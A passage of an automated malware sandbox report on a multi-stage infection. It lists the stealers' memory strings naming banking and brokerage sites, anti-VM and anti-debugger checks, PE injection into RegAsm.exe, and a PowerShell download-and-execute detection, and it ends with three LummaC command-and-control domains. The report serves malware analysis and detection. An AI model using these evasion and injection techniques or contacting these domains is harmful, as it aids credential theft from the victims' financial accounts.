Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: axplong.exe, axplong.exe, 00000006.00000002.3515196648.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Nework.exe, 00000012.00000002.2833088082.000000000176B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{5)
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a.rdata$.refptr.__xi_z.rdata$.refptr.__xi_aWinMainCRTStartup.l_startwmainCRTStartup.rdata$.refptr._gnu_exception_handler.rdata$.refptr._matherr.CRT$XCAA.CRT$XIAA.debug_info.debug_abbrev.debug_loc.debug_aranges.debug_ranges.debug_line.debug_str.rdata$zzz.debug_frame__gcc_register_frame__gcc_deregister_frameIsRunningAsAdminRestartAsAdminIsProcessRunningMonitorAndLaunchProcessIsVirtualMachinecheck_device_infoCheckForVirtualMachineIsAnotherInstanceRunningCopySelfToTempExecuteCommandget_os_nameget_system_infobase64_encodebase64_decodeexecute_command_from_responsesend_post_request__do_global_dtors__do_global_ctors.rdata$.refptr.__CTOR_LIST__initializedmy_lconv_init__security_init_cookie.data$__security_cookie.data$__security_cookie_complement__report_gsfailureGS_ContextRecordGS_ExceptionRecordGS_ExceptionPointers__dyn_tls_dtor__dyn_tls_init.rdata$.refptr._CRT_MT__tlregdtor__mingw_raise_matherrstUserMathErr__mingw_setusermatherr_decode_pointer_encode_pointer__report_error__write_memory.part.0maxSections_pei386_runtime_relocatorwas_init.95200.rdata$.refptr.__RUNTIME_PSEUDO_RELOC_LIST_END__.rdata$.refptr.__RUNTIME_PSEUDO_RELOC_LIST__.text.unlikely.xdata.unlikely.pdata.unlikely__mingw_SEH_error_handler__mingw_init_ehandlerwas_here.95039emu_pdataemu_xdata_gnu_exception_handler__mingwthr_run_key_dtors.part.0__mingwthr_cskey_dtor_list___w64_mingwthr_add_key_dtor__mingwthr_cs_init___w64_mingwthr_remove_key_dtor__mingw_TLScallbackpseudo-reloc-list.c_ValidateImageBase.part.0_ValidateImageBase_FindPESection
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW3
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005DD7000.00000004.00000020.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3060091921.0000000006DA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003703000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003657000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000032EB000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000357D000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003776000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000003007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.000000000312D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe`,
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CheckForVirtualMachine
Source: file.exe, 00000000.00000002.2227763808.0000000000D55000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2262996473.0000000000405000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2276480670.0000000000405000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3515196648.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05580C46 rdtsc 0_2_05580C46
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00507560 LdrInitializeThunk, 16_2_00507560
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00407B01
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0023645B mov eax, dword ptr fs:[00000030h] 6_2_0023645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0023A1C2 mov eax, dword ptr fs:[00000030h] 6_2_0023A1C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041914C mov eax, dword ptr fs:[00000030h] 15_2_0041914C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004114A6 mov ecx, dword ptr fs:[00000030h] 15_2_004114A6
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041EFD8 GetProcessHeap, 15_2_0041EFD8
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00407B01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407C63 SetUnhandledExceptionFilter, 15_2_00407C63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00407D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0040DD78
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: needmoney.exe PID: 3360, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe, type: DROPPED
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Code function: 8_2_031624E9 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 8_2_031624E9
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
LummaC encrypted strings found
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: reinforcenh.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: stogeneratmns.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: fragnantbui.shop
